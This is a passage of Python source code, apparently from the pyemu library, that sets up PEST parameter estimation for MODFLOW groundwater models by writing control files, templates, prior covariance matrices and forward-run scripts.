struct_dict[self.spatial_list_geostruct] = bc_dfs
if "hfb" in self.par_dfs.keys():
if self.spatial_list_geostruct in struct_dict.keys():
struct_dict[self.spatial_list_geostruct].append(self.par_dfs["hfb"])
else:
struct_dict[self.spatial_list_geostruct] = [self.par_dfs["hfb"]]
if "sfr" in self.par_dfs.keys():
self.logger.warn("geospatial prior not implemented for SFR pars")
if len(struct_dict) > 0:
cov = pyemu.helpers.geostatistical_prior_builder(self.pst,
struct_dict=struct_dict,
sigma_range=sigma_range)
else:
cov = pyemu.Cov.from_parameter_data(self.pst, sigma_range=sigma_range)
if filename is None:
filename = os.path.join(self.m.model_ws, self.pst_name + ".prior.cov")
if fmt != "none":
self.logger.statement("saving prior covariance matrix to file {0}".format(filename))
if fmt == 'ascii':
cov.to_ascii(filename)
elif fmt == 'binary':
cov.to_binary(filename, droptol=droptol, chunk=chunk)
elif fmt == 'uncfile':
cov.to_uncfile(filename)
elif fmt == 'coo':
cov.to_coo(filename, droptol=droptol, chunk=chunk)
self.log("building prior covariance matrix")
return cov
def build_pst(self, filename=None):
""" build the pest control file using the parameters and
observations.
Args:
filename (`str`): the filename to save the contorl file to. If None, the
name if formed from the model namfile name. Default is None. The control
is saved in the `PstFromFlopy.m.model_ws` directory.
Note:
calls pyemu.Pst.from_io_files
calls PESTCHEK
"""
self.logger.statement("changing dir in to {0}".format(self.m.model_ws))
os.chdir(self.m.model_ws)
tpl_files = copy.deepcopy(self.tpl_files)
in_files = copy.deepcopy(self.in_files)
try:
files = os.listdir('.')
new_tpl_files = [f for f in files if f.endswith(".tpl") and f not in tpl_files]
new_in_files = [f.replace(".tpl", '') for f in new_tpl_files]
tpl_files.extend(new_tpl_files)
in_files.extend(new_in_files)
ins_files = [f for f in files if f.endswith(".ins")]
out_files = [f.replace(".ins", '') for f in ins_files]
for tpl_file, in_file in zip(tpl_files, in_files):
if tpl_file not in self.tpl_files:
self.tpl_files.append(tpl_file)
self.in_files.append(in_file)
for ins_file, out_file in zip(ins_files, out_files):
if ins_file not in self.ins_files:
self.ins_files.append(ins_file)
self.out_files.append(out_file)
self.log("instantiating control file from i/o files")
self.logger.statement("tpl files: {0}".format(",".join(self.tpl_files)))
self.logger.statement("ins files: {0}".format(",".join(self.ins_files)))
pst = pyemu.Pst.from_io_files(tpl_files=self.tpl_files,
in_files=self.in_files,
ins_files=self.ins_files,
out_files=self.out_files)
self.log("instantiating control file from i/o files")
except Exception as e:
os.chdir("..")
self.logger.lraise("error build Pst:{0}".format(str(e)))
os.chdir('..')
# more customization here
par = pst.parameter_data
for name, df in self.par_dfs.items():
if "parnme" not in df.columns:
continue
df.index = df.parnme
for col in par.columns:
if col in df.columns:
par.loc[df.parnme, col] = df.loc[:, col]
par.loc[:, "parubnd"] = 10.0
par.loc[:, "parlbnd"] = 0.1
for name, df in self.par_dfs.items():
if "parnme" not in df:
continue
df.index = df.parnme
for col in ["parubnd", "parlbnd", "pargp"]:
if col in df.columns:
par.loc[df.index, col] = df.loc[:, col]
for tag, [lw, up] in wildass_guess_par_bounds_dict.items():
par.loc[par.parnme.apply(lambda x: x.startswith(tag)), "parubnd"] = up
par.loc[par.parnme.apply(lambda x: x.startswith(tag)), "parlbnd"] = lw
if self.par_bounds_dict is not None:
for tag, [lw, up] in self.par_bounds_dict.items():
par.loc[par.parnme.apply(lambda x: x.startswith(tag)), "parubnd"] = up
par.loc[par.parnme.apply(lambda x: x.startswith(tag)), "parlbnd"] = lw
obs = pst.observation_data
for name, df in self.obs_dfs.items():
if "obsnme" not in df.columns:
continue
df.index = df.obsnme
for col in df.columns:
if col in obs.columns:
obs.loc[df.obsnme, col] = df.loc[:, col]
self.pst_name = self.m.name + ".pst"
pst.model_command = ["python forward_run.py"]
pst.control_data.noptmax = 0
self.log("writing forward_run.py")
self.write_forward_run()
self.log("writing forward_run.py")
if filename is None:
filename = os.path.join(self.m.model_ws, self.pst_name)
self.logger.statement("writing pst {0}".format(filename))
pst.write(filename)
self.pst = pst
self.log("running pestchek on {0}".format(self.pst_name))
os.chdir(self.m.model_ws)
try:
pyemu.os_utils.run("pestchek {0} >pestchek.stdout".format(self.pst_name))
except Exception as e:
self.logger.warn("error running pestchek:{0}".format(str(e)))
for line in open("pestchek.stdout"):
self.logger.statement("pestcheck:{0}".format(line.strip()))
os.chdir("..")
self.log("running pestchek on {0}".format(self.pst_name))
def _add_external(self):
""" add external (existing) template files and/or instruction files to the
Pst instance
"""
if self.external_tpl_in_pairs is not None:
if not isinstance(self.external_tpl_in_pairs, list):
external_tpl_in_pairs = [self.external_tpl_in_pairs]
for tpl_file, in_file in self.external_tpl_in_pairs:
if not os.path.exists(tpl_file):
self.logger.lraise("couldn't find external tpl file:{0}". \
format(tpl_file))
self.logger.statement("external tpl:{0}".format(tpl_file))
shutil.copy2(tpl_file, os.path.join(self.m.model_ws,
os.path.split(tpl_file)[-1]))
if os.path.exists(in_file):
shutil.copy2(in_file, os.path.join(self.m.model_ws,
os.path.split(in_file)[-1]))
if self.external_ins_out_pairs is not None:
if not isinstance(self.external_ins_out_pairs, list):
external_ins_out_pairs = [self.external_ins_out_pairs]
for ins_file, out_file in self.external_ins_out_pairs:
if not os.path.exists(ins_file):
self.logger.lraise("couldn't find external ins file:{0}". \
format(ins_file))
self.logger.statement("external ins:{0}".format(ins_file))
shutil.copy2(ins_file, os.path.join(self.m.model_ws,
os.path.split(ins_file)[-1]))
if os.path.exists(out_file):
shutil.copy2(out_file, os.path.join(self.m.model_ws,
os.path.split(out_file)[-1]))
self.logger.warn("obs listed in {0} will have values listed in {1}"
.format(ins_file, out_file))
else:
self.logger.warn("obs listed in {0} will have generic values")
def write_forward_run(self):
""" write the forward run script forward_run.py
Note:
This method can be called repeatedly, especially after any
changed to the pre- and/or post-processing routines.
"""
with open(os.path.join(self.m.model_ws, self.forward_run_file), 'w') as f:
f.write("import os\nimport multiprocessing as mp\nimport numpy as np" + \
"\nimport pandas as pd\nimport flopy\n")
f.write("import pyemu\n")
f.write("def main():\n")
f.write("\n")
s = " "
for ex_imp in self.extra_forward_imports:
f.write(s + 'import {0}\n'.format(ex_imp))
for tmp_file in self.tmp_files:
f.write(s + "try:\n")
f.write(s + " os.remove('{0}')\n".format(tmp_file))
f.write(s + "except Exception as e:\n")
f.write(s + " print('error removing tmp file:{0}')\n".format(tmp_file))
for line in self.frun_pre_lines:
f.write(s + line + '\n')
for line in self.frun_model_lines:
f.write(s + line + '\n')
for line in self.frun_post_lines:
f.write(s + line + '\n')
f.write("\n")
f.write("if __name__ == '__main__':\n")
f.write(" mp.freeze_support()\n main()\n\n")
def _parse_k(self, k, vals):
""" parse the iterable from a property or boundary condition argument
"""
try:
k = int(k)
except:
pass
else:
assert k in vals, "k {0} not in vals".format(k)
return [k]
if k is None:
return vals
else:
try:
k_vals = vals[k]
except Exception as e:
raise Exception("error slicing vals with {0}:{1}".
format(k, str(e)))
return k_vals
def _parse_pakattr(self, pakattr):
""" parse package-iterable pairs from a property or boundary condition
argument
"""
raw = pakattr.lower().split('.')
if len(raw) != 2:
self.logger.lraise("pakattr is wrong:{0}".format(pakattr))
pakname = raw[0]
attrname = raw[1]
pak = self.m.get_package(pakname)
if pak is None:
if pakname == "extra":
self.logger.statement("'extra' pak detected:{0}".format(pakattr))
ud = flopy.utils.Util3d(self.m, (self.m.nlay, self.m.nrow, self.m.ncol), np.float32, 1.0, attrname)
return "extra", ud
self.logger.lraise("pak {0} not found".format(pakname))
if hasattr(pak, attrname):
attr = getattr(pak, attrname)
return pak, attr
elif hasattr(pak, "stress_period_data"):
dtype = pak.stress_period_data.dtype
if attrname not in dtype.names:
self.logger.lraise("attr {0} not found in dtype.names for {1}.stress_period_data". \
format(attrname, pakname))
attr = pak.stress_period_data
return pak, attr, attrname
# elif hasattr(pak,'hfb_data'):
# dtype = pak.hfb_data.dtype
# if attrname not in dtype.names:
# self.logger.lraise('attr {0} not found in dtypes.names for {1}.hfb_data. Thanks for playing.'.\
# format(attrname,pakname))
# attr = pak.hfb_data
# return pak, attr, attrname
else:
self.logger.lraise("unrecognized attr:{0}".format(attrname))
def _setup_list_pars(self):
""" main entry point for setting up list multiplier
parameters
"""
tdf = self._setup_temporal_list_pars()
sdf = self._setup_spatial_list_pars()
if tdf is None and sdf is None:
return
os.chdir(self.m.model_ws)
try:
apply_list_pars()
except Exception as e:
os.chdir("..")
self.logger.lraise("error test running apply_list_pars():{0}".format(str(e)))
os.chdir('..')
line = "pyemu.helpers.apply_list_pars()\n"
self.logger.statement("forward_run line:{0}".format(line))
self.frun_pre_lines.append(line)
def _setup_temporal_list_pars(self):
if len(self.temporal_list_props) == 0:
return
self.log("processing temporal_list_props")
bc_filenames = []
bc_cols = []
bc_pak = []
bc_k = []
bc_dtype_names = []
bc_parnme = []
if len(self.temporal_list_props) == 2:
if not isinstance(self.temporal_list_props[0], list):
self.temporal_list_props = [self.temporal_list_props]
for pakattr, k_org in self.temporal_list_props:
pak, attr, col = self._parse_pakattr(pakattr)
k_parse = self._parse_k(k_org, np.arange(self.m.nper))
c = self._get_count(pakattr)
for k in k_parse:
bc_filenames.append(self._list_helper(k, pak, attr, col))
bc_cols.append(col)
pak_name = pak.name[0].lower()
bc_pak.append(pak_name)
bc_k.append(k)
bc_dtype_names.append(','.join(attr.dtype.names))
bc_parnme.append("{0}{1}_{2:03d}".format(pak_name, col, c))
df = pd.DataFrame({"filename": bc_filenames, "col": bc_cols,
"kper": bc_k, "pak": bc_pak,
"dtype_names": bc_dtype_names,
"parnme": bc_parnme})
tds = pd.to_timedelta(np.cumsum(self.m.dis.perlen.array), unit='d')
dts = pd.to_datetime(self.m._start_datetime) + tds
df.loc[:, "datetime"] = df.kper.apply(lambda x: dts[x])
df.loc[:, "timedelta"] = df.kper.apply(lambda x: tds[x])
df.loc[:, "val"] = 1.0
# df.loc[:,"kper"] = df.kper.apply(np.int)
# df.loc[:,"parnme"] = df.apply(lambda x: "{0}{1}_{2:03d}".format(x.pak,x.col,x.kper),axis=1)
df.loc[:, "tpl_str"] = df.parnme.apply(lambda x: "~ {0} ~".format(x))
df.loc[:, "list_org"] = self.list_org
df.loc[:, "model_ext_path"] = self.m.external_path
df.loc[:, "pargp"] = df.parnme.apply(lambda x: x.split('_')[0])
names = ["filename", "dtype_names", "list_org", "model_ext_path", "col", "kper", "pak", "val"]
df.loc[:, names]. \
to_csv(os.path.join(self.m.model_ws, "temporal_list_pars.dat"), sep=' ')
df.loc[:, "val"] = df.tpl_str
tpl_name = os.path.join(self.m.model_ws, 'temporal_list_pars.dat.tpl')
# f_tpl = open(tpl_name,'w')
# f_tpl.write("ptf ~\n")
# f_tpl.flush()
# df.loc[:,names].to_csv(f_tpl,sep=' ',quotechar=' ')
# f_tpl.write("index ")
# f_tpl.write(df.loc[:,names].to_string(index_names=True))
# f_tpl.close()
_write_df_tpl(tpl_name, df.loc[:, names], sep=' ', index_label="index", quotechar=" ")
self.par_dfs["temporal_list"] = df
self.log("processing temporal_list_props")
return True
def _setup_spatial_list_pars(self):
if len(self.spatial_list_props) == 0:
return
self.log("processing spatial_list_props")
bc_filenames = []
bc_cols = []
bc_pak = []
bc_k = []
bc_dtype_names = []
bc_parnme = []
if len(self.spatial_list_props) == 2:
if not isinstance(self.spatial_list_props[0], list):
self.spatial_list_props = [self.spatial_list_props]
for pakattr, k_org in self.spatial_list_props:
pak, attr, col = self._parse_pakattr(pakattr)
k_parse = self._parse_k(k_org, np.arange(self.m.nlay))
if len(k_parse) > 1:
self.logger.lraise("spatial_list_pars error: each set of spatial list pars can only be applied " + \
"to a single layer (e.g. [wel.flux,0].\n" + \
"You passed [{0},{1}], implying broadcasting to layers {2}".
format(pakattr, k_org, k_parse))
# # horrible special case for HFB since it cannot vary over time
# if type(pak) != flopy.modflow.mfhfb.ModflowHfb:
for k in range(self.m.nper):
bc_filenames.append(self._list_helper(k, pak, attr, col))
bc_cols.append(col)
pak_name = pak.name[0].lower()
bc_pak.append(pak_name)
bc_k.append(k_parse[0])
bc_dtype_names.append(','.join(attr.dtype.names))
info_df = pd.DataFrame({"filename": bc_filenames, "col": bc_cols,
"k": bc_k, "pak": bc_pak,
"dtype_names": bc_dtype_names})
info_df.loc[:, "list_mlt"] = self.list_mlt
info_df.loc[:, "list_org"] = self.list_org
info_df.loc[:, "model_ext_path"] = self.m.external_path
# check that all files for a given package have the same number of entries
info_df.loc[:, "itmp"] = np.NaN
pak_dfs = {}
for pak in info_df.pak.unique():
df_pak = info_df.loc[info_df.pak == pak, :]
itmp = []
for filename in df_pak.filename:
names = df_pak.dtype_names.iloc[0].split(',')
# mif pak != 'hfb6':
fdf = pd.read_csv(os.path.join(self.m.model_ws, filename),
delim_whitespace=True, header=None, names=names)
for c in ['k', 'i', 'j']:
fdf.loc[:, c] -= 1
# else:
# # need to navigate the HFB file to skip both comments and header line
# skiprows = sum(
# [1 if i.strip().startswith('#') else 0
# for i in open(os.path.join(self.m.model_ws, filename), 'r').readlines()]) + 1
# fdf = pd.read_csv(os.path.join(self.m.model_ws, filename),
# delim_whitespace=True, header=None, names=names, skiprows=skiprows ).dropna()
#
# for c in ['k', 'irow1','icol1','irow2','icol2']:
# fdf.loc[:, c] -= 1
itmp.append(fdf.shape[0])
pak_dfs[pak] = fdf
info_df.loc[info_df.pak == pak, "itmp"] = itmp
if np.unique(np.array(itmp)).shape[0] != 1:
info_df.to_csv("spatial_list_trouble.csv")
self.logger.lraise("spatial_list_pars() error: must have same number of " + \
"entries for every stress period for {0}".format(pak))
# make the pak dfs have unique model indices
for pak, df in pak_dfs.items():
# if pak != 'hfb6':
df.loc[:, "idx"] = df.apply(lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}".format(x.k, x.i, x.j), axis=1)
# else:
# df.loc[:, "idx"] = df.apply(lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}{2:04.0f}{2:04.0f}".format(x.k, x.irow1, x.icol1,
# x.irow2, x.icol2), axis=1)
if df.idx.unique().shape[0] != df.shape[0]:
self.logger.warn("duplicate entries in list pak {0}...collapsing".format(pak))
df.drop_duplicates(subset="idx", inplace=True)
df.index = df.idx
pak_dfs[pak] = df
# write template files - find which cols are parameterized...
par_dfs = []
for pak, df in pak_dfs.items():
pak_df = info_df.loc[info_df.pak == pak, :]
# reset all non-index cols to 1.0
for col in df.columns:
if col not in ['k', 'i', 'j', 'inode', 'irow1', 'icol1', 'irow2', 'icol2']:
df.loc[:, col] = 1.0
in_file = os.path.join(self.list_mlt, pak + ".csv")
tpl_file = os.path.join(pak + ".csv.tpl")
# save an all "ones" mult df for testing
df.to_csv(os.path.join(self.m.model_ws, in_file), sep=' ')
parnme, pargp = [], []
# if pak != 'hfb6':
x = df.apply(lambda x: self.m.sr.xcentergrid[int(x.i), int(x.j)], axis=1).values
y = df.apply(lambda x: self.m.sr.ycentergrid[int(x.i), int(x.j)], axis=1).values
# else:
# # note -- for HFB6, only row and col for node 1
# x = df.apply(lambda x: self.m.sr.xcentergrid[int(x.irow1),int(x.icol1)],axis=1).values
# y = df.apply(lambda x: self.m.sr.ycentergrid[int(x.irow1),int(x.icol1)],axis=1).values
for col in pak_df.col.unique():
col_df = pak_df.loc[pak_df.col == col]
k_vals = col_df.k.unique()
npar = col_df.k.apply(lambda x: x in k_vals).shape[0]
if npar == 0:
continue
names = df.index.map(lambda x: "{0}{1}{2}".format(pak[0], col[0], x))
df.loc[:, col] = names.map(lambda x: "~ {0} ~".format(x))
df.loc[df.k.apply(lambda x: x not in k_vals), col] = 1.0
par_df = pd.DataFrame({"parnme": names, "x": x, "y": y, "k": df.k.values}, index=names)
par_df = par_df.loc[par_df.k.apply(lambda x: x in k_vals)]
if par_df.shape[0] == 0:
self.logger.lraise("no parameters found for spatial list k,pak,attr {0}, {1}, {2}".
format(k_vals, pak, col))
par_df.loc[:, "pargp"] = df.k.apply(lambda x: "{0}{1}_k{2:02.0f}".format(pak, col, int(x))).values
par_df.loc[:, "tpl_file"] = tpl_file
par_df.loc[:, "in_file"] = in_file
par_dfs.append(par_df)
# with open(os.path.join(self.m.model_ws,tpl_file),'w') as f:
# f.write("ptf ~\n")
# f.flush()
# df.to_csv(f)
# f.write("index ")
# f.write(df.to_string(index_names=False)+'\n')
_write_df_tpl(os.path.join(self.m.model_ws, tpl_file), df, sep=' ', quotechar=" ", index_label="index")
self.tpl_files.append(tpl_file)
self.in_files.append(in_file)
par_df = pd.concat(par_dfs)
self.par_dfs["spatial_list"] = par_df
info_df.to_csv(os.path.join(self.m.model_ws, "spatial_list_pars.dat"), sep=' ')
self.log("processing spatial_list_props")
return True
def _list_helper(self, k, pak, attr, col):
""" helper to setup list multiplier parameters for a given
k, pak, attr set.
"""
# special case for horrible HFB6 exception
# if type(pak) == flopy.modflow.mfhfb.ModflowHfb:
# filename = pak.file_name[0]
# else:
filename = attr.get_filename(k)
filename_model = os.path.join(self.m.external_path, filename)
shutil.copy2(os.path.join(self.m.model_ws, filename_model),
os.path.join(self.m.model_ws, self.list_org, filename))
return filename_model
def _setup_hds(self):
""" setup modflow head save file observations for given kper (zero-based
stress period index) and k (zero-based layer index) pairs using the
kperk argument.
"""
if self.hds_kperk is None or len(self.hds_kperk) == 0:
return
from .gw_utils import setup_hds_obs
# if len(self.hds_kperk) == 2:
# try:
# if len(self.hds_kperk[0] == 2):
# pass
# except:
# self.hds_kperk = [self.hds_kperk]
oc = self.m.get_package("OC")
if oc is None:
raise Exception("can't find OC package in model to setup hds grid obs")
if not oc.savehead:
raise Exception("OC not saving hds, can't setup grid obs")
hds_unit = oc.iuhead
hds_file = self.m.get_output(unit=hds_unit)
assert os.path.exists(os.path.join(self.org_model_ws, hds_file)), \
"couldn't find existing hds file {0} in org_model_ws".format(hds_file)
shutil.copy2(os.path.join(self.org_model_ws, hds_file),
os.path.join(self.m.model_ws, hds_file))
inact = None
if self.m.lpf is not None:
inact = self.m.lpf.hdry
elif self.m.upw is not None:
inact = self.m.upw.hdry
if inact is None:
skip = lambda x: np.NaN if x == self.m.bas6.hnoflo else x
else:
skip = lambda x: np.NaN if x == self.m.bas6.hnoflo or x == inact else x
print(self.hds_kperk)
frun_line, df = setup_hds_obs(os.path.join(self.m.model_ws, hds_file),
kperk_pairs=self.hds_kperk, skip=skip)
self.obs_dfs["hds"] = df
self.frun_post_lines.append("pyemu.gw_utils.apply_hds_obs('{0}')".format(hds_file))
self.tmp_files.append(hds_file)
def _setup_smp(self):
""" setup observations from PEST-style SMP file pairs
"""
if self.obssim_smp_pairs is None:
return
if len(self.obssim_smp_pairs) == 2:
if isinstance(self.obssim_smp_pairs[0], str):
self.obssim_smp_pairs = [self.obssim_smp_pairs]
for obs_smp, sim_smp in self.obssim_smp_pairs:
self.log("processing {0} and {1} smp files".format(obs_smp, sim_smp))
if not os.path.exists(obs_smp):
self.logger.lraise("couldn't find obs smp: {0}".format(obs_smp))
if not os.path.exists(sim_smp):
self.logger.lraise("couldn't find sim smp: {0}".format(sim_smp))
new_obs_smp = os.path.join(self.m.model_ws,
os.path.split(obs_smp)[-1])
shutil.copy2(obs_smp, new_obs_smp)
new_sim_smp = os.path.join(self.m.model_ws,
os.path.split(sim_smp)[-1])
shutil.copy2(sim_smp, new_sim_smp)
pyemu.smp_utils.smp_to_ins(new_sim_smp)
def _setup_hob(self):
""" setup observations from the MODFLOW HOB package
"""
if self.m.hob is None:
return
hob_out_unit = self.m.hob.iuhobsv
new_hob_out_fname = os.path.join(self.m.model_ws, self.m.get_output_attribute(unit=hob_out_unit))
org_hob_out_fname = os.path.join(self.org_model_ws, self.m.get_output_attribute(unit=hob_out_unit))
if not os.path.exists(org_hob_out_fname):
self.logger.warn("could not find hob out file: {0}...skipping".format(hob_out_fname))
return
shutil.copy2(org_hob_out_fname, new_hob_out_fname)
hob_df = pyemu.gw_utils.modflow_hob_to_instruction_file(new_hob_out_fname)
self.obs_dfs["hob"] = hob_df
self.tmp_files.append(os.path.split(hob_out_fname))
def _setup_hyd(self):
""" setup observations from the MODFLOW HYDMOD package
"""
if self.m.hyd is None:
return
if self.mfhyd:
org_hyd_out = os.path.join(self.org_model_ws, self.m.name + ".hyd.bin")
if not os.path.exists(org_hyd_out):
self.logger.warn("can't find existing hyd out file:{0}...skipping".
format(org_hyd_out))
return
new_hyd_out = os.path.join(self.m.model_ws, os.path.split(org_hyd_out)[-1])
shutil.copy2(org_hyd_out, new_hyd_out)
df = pyemu.gw_utils.modflow_hydmod_to_instruction_file(new_hyd_out)
df.loc[:, "obgnme"] = df.obsnme.apply(lambda x: '_'.join(x.split('_')[:-1]))
line = "pyemu.gw_utils.modflow_read_hydmod_file('{0}')". \
format(os.path.split(new_hyd_out)[-1])
self.logger.statement("forward_run line: {0}".format(line))
self.frun_post_lines.append(line)
self.obs_dfs["hyd"] = df
self.tmp_files.append(os.path.split(new_hyd_out)[-1])
def _setup_water_budget_obs(self):
""" setup observations from the MODFLOW list file for
volume and flux water buget information
"""
if self.mflist_waterbudget:
org_listfile = os.path.join(self.org_model_ws, self.m.lst.file_name[0])
if os.path.exists(org_listfile):
shutil.copy2(org_listfile, os.path.join(self.m.model_ws,
self.m.lst.file_name[0]))
else:
self.logger.warn("can't find existing list file:{0}...skipping".
format(org_listfile))
return
list_file = os.path.join(self.m.model_ws, self.m.lst.file_name[0])
flx_file = os.path.join(self.m.model_ws, "flux.dat")
vol_file = os.path.join(self.m.model_ws, "vol.dat")
df = pyemu.gw_utils.setup_mflist_budget_obs(list_file,
flx_filename=flx_file,
vol_filename=vol_file,
start_datetime=self.m.start_datetime)
if df is not None:
self.obs_dfs["wb"] = df
# line = "try:\n os.remove('{0}')\nexcept:\n pass".format(os.path.split(list_file)[-1])
# self.logger.statement("forward_run line:{0}".format(line))
# self.frun_pre_lines.append(line)
self.tmp_files.append(os.path.split(list_file)[-1])
line = "pyemu.gw_utils.apply_mflist_budget_obs('{0}',flx_filename='{1}',vol_filename='{2}',start_datetime='{3}')". \
format(os.path.split(list_file)[-1],
os.path.split(flx_file)[-1],
os.path.split(vol_file)[-1],
self.m.start_datetime)
self.logger.statement("forward_run line:{0}".format(line))
self.frun_post_lines.append(line)
def apply_list_and_array_pars(arr_par_file="mult2model_info.csv", chunk_len=50):
""" Apply multiplier parameters to list and array style model files
Args:
arr_par_file (str):
chunk_len (`int`): the number of files to process per multiprocessing
chunk in appl_array_pars(). default is 50.
Returns:
Note:
Used to implement the parameterization constructed by
PstFrom during a forward run
Should be added to the forward_run.py script
"""
df = pd.read_csv(arr_par_file, index_col=0)
arr_pars = df.loc[df.index_cols.isna()].copy()
list_pars = df.loc[df.index_cols.notna()].copy()
# extract lists from string in input df
list_pars['index_cols'] = list_pars.index_cols.apply(
lambda x: literal_eval(x))
list_pars['use_cols'] = list_pars.use_cols.apply(
lambda x: literal_eval(x))
list_pars['lower_bound'] = list_pars.lower_bound.apply(
lambda x: literal_eval(x))
list_pars['upper_bound'] = list_pars.upper_bound.apply(
lambda x: literal_eval(x))
# TODO check use_cols is always present
apply_genericlist_pars(list_pars)
apply_array_pars(arr_pars,chunk_len=chunk_len)
def _process_chunk_fac2real(chunk,i):
for args in chunk:
pyemu.geostats.fac2real(**args)
print("process",i," processed ",len(chunk),"fac2real calls")
def _process_chunk_model_files(chunk,i,df):
for model_file in chunk:
_process_model_file(model_file, df)
print("process", i, " processed ", len(chunk), "process_model_file calls")
def _process_model_file(model_file, df):
# find all mults that need to be applied to this array
df_mf = df.loc[df.model_file == model_file, :]
results = []
org_file = df_mf.org_file.unique()
if org_file.shape[0] != 1:
raise Exception("wrong number of org_files for {0}".
format(model_file))
org_arr = np.loadtxt(org_file[0])
for mlt in df_mf.mlt_file:
if pd.isna(mlt):
continue
mlt_data = np.loadtxt(mlt)
if org_arr.shape != mlt_data.shape:
raise Exception("shape of org file {}:{} differs from mlt file {}:{}".format(org_file, org_arr.shape,
mlt, mlt_data.shape))
org_arr *= np.loadtxt(mlt)
if "upper_bound" in df.columns:
ub_vals = df_mf.upper_bound.value_counts().dropna().to_dict()
if len(ub_vals) == 0:
pass
elif len(ub_vals) > 1:
print(ub_vals)
raise Exception("different upper bound values for {0}".format(org_file))
else:
ub = float(list(ub_vals.keys())[0])
org_arr[org_arr>ub] = ub
if "lower_bound" in df.columns:
lb_vals = df_mf.lower_bound.value_counts().dropna().to_dict()
if len(lb_vals) == 0:
pass
elif len(lb_vals) > 1:
raise Exception("different lower bound values for {0}".format(org_file))
else:
lb = float(list(lb_vals.keys())[0])
org_arr[org_arr < lb] = lb
np.savetxt(model_file, np.atleast_2d(org_arr), fmt="%15.6E", delimiter='')
def apply_array_pars(arr_par="arr_pars.csv", arr_par_file=None,chunk_len=50):
""" a function to apply array-based multipler parameters.
Args:
arr_par (`str` or `pandas.DataFrame`): if type `str`,
path to csv file detailing parameter array multipliers.
This file can be written by PstFromFlopy.
if type `pandas.DataFrame` is Dataframe with columns of
['mlt_file', 'model_file', 'org_file'] and optionally
['pp_file', 'fac_file'].
chunk_len (`int`) : the number of files to process per chunk
with multiprocessing - applies to both fac2real and process_
input_files. Default is 50.
Note:
Used to implement the parameterization constructed by
PstFromFlopyModel during a forward run
This function should be added to the forward_run.py script but can
be called on any correctly formatted csv
This function using multiprocessing, spawning one process for each
model input array (and optionally pp files). This speeds up
execution time considerably but means you need to make sure your
forward run script uses the proper multiprocessing idioms for
freeze support and main thread handling.
"""
if arr_par_file is not None:
warnings.warn("`arr_par_file` argument is deprecated and replaced "
"by arr_par. Method now support passing DataFrame as "
"arr_par arg.",
PyemuWarning)
arr_par = arr_par_file
if isinstance(arr_par, str):
df = pd.read_csv(arr_par, index_col=0)
elif isinstance(arr_par, pd.DataFrame):
df = arr_par
else:
raise TypeError("`arr_par` argument must be filename string or "
"Pandas DataFrame, "
"type {0} passed".format(type(arr_par)))
# for fname in df.model_file:
# try:
# os.remove(fname)
# except:
# print("error removing mult array:{0}".format(fname))
if 'pp_file' in df.columns:
print("starting fac2real", datetime.now())
pp_df = df.loc[df.pp_file.notna(),
['pp_file', 'fac_file', 'mlt_file']].rename(
columns={'fac_file': 'factors_file', 'mlt_file': 'out_file'})
pp_df.loc[:, 'lower_lim'] = 1.0e-10
# don't need to process all (e.g. if const. mults apply across kper...)
pp_args = pp_df.drop_duplicates().to_dict('records')
num_ppargs = len(pp_args)
num_chunk_floor = num_ppargs // chunk_len
main_chunks = np.array(pp_args)[:num_chunk_floor * chunk_len].reshape(
[-1, chunk_len]).tolist()
remainder = np.array(pp_args)[num_chunk_floor * chunk_len:].tolist()
chunks = main_chunks + [remainder]
pool = mp.Pool()
x = [pool.apply_async(_process_chunk_fac2real,args=(chunk,i)) for i,chunk in enumerate(chunks)]
[xx.get() for xx in x]
pool.close()
pool.join()
# procs = []
# for chunk in chunks:
# p = mp.Process(target=_process_chunk_fac2real, args=[chunk])
# p.start()
# procs.append(p)
# for p in procs:
# p.join()
print("finished fac2real", datetime.now())
print("starting arr mlt", datetime.now())
uniq = df.model_file.unique() # unique model input files to be produced
num_uniq = len(uniq) # number of input files to be produced
# number of files to send to each processor
# lazy plitting the files to be processed into even chunks
num_chunk_floor = num_uniq // chunk_len # number of whole chunks
main_chunks = uniq[:num_chunk_floor * chunk_len].reshape(
[-1, chunk_len]).tolist() # the list of files broken down into chunks
remainder = uniq[num_chunk_floor * chunk_len:].tolist() # remaining files
chunks = main_chunks + [remainder]
# procs = []
# for chunk in chunks: # now only spawn processor for each chunk
# p = mp.Process(target=_process_chunk_model_files, args=[chunk, df])
# p.start()
# procs.append(p)
# for p in procs:
# r = p.get(False)
# p.join()
pool = mp.Pool()
x = [pool.apply_async(_process_chunk_model_files,args=(chunk,i,df)) for i,chunk in enumerate(chunks)]
[xx.get() for xx in x]
pool.close()
pool.join()
print("finished arr mlt", datetime.now())
def apply_list_pars():
""" a function to apply boundary condition multiplier parameters.
Note:
Used to implement the parameterization constructed by
PstFromFlopyModel during a forward run
Requires either "temporal_list_pars.csv" or "spatial_list_pars.csv"
Should be added to the forward_run.py script
"""
temp_file = "temporal_list_pars.dat"
spat_file = "spatial_list_pars.dat"
temp_df, spat_df = None, None
if os.path.exists(temp_file):
temp_df = pd.read_csv(temp_file, delim_whitespace=True)
temp_df.loc[:, "split_filename"] = temp_df.filename.apply(lambda x: os.path.split(x)[-1])
org_dir = temp_df.list_org.iloc[0]
model_ext_path = temp_df.model_ext_path.iloc[0]
if os.path.exists(spat_file):
spat_df = pd.read_csv(spat_file, delim_whitespace=True)
spat_df.loc[:, "split_filename"] = spat_df.filename.apply(lambda x: os.path.split(x)[-1])
mlt_dir = spat_df.list_mlt.iloc[0]
org_dir = spat_df.list_org.iloc[0]
model_ext_path = spat_df.model_ext_path.iloc[0]
if temp_df is None and spat_df is None:
raise Exception("apply_list_pars() - no key dfs found, nothing to do...")
# load the spatial mult dfs
sp_mlts = {}
if spat_df is not None:
for f in os.listdir(mlt_dir):
pak = f.split(".")[0].lower()
df = pd.read_csv(os.path.join(mlt_dir, f), index_col=0, delim_whitespace=True)
# if pak != 'hfb6':
df.index = df.apply(lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}".format(x.k, x.i, x.j), axis=1)
# else:
# df.index = df.apply(lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}{2:04.0f}{2:04.0f}".format(x.k, x.irow1, x.icol1,
# x.irow2, x.icol2), axis = 1)
if pak in sp_mlts.keys():
raise Exception("duplicate multiplier csv for pak {0}".format(pak))
if df.shape[0] == 0:
raise Exception("empty dataframe for spatial list file: {0}".format(f))
sp_mlts[pak] = df
org_files = os.listdir(org_dir)
# for fname in df.filename.unique():
for fname in org_files:
# need to get the PAK name to handle stupid horrible expceptions for HFB...
# try:
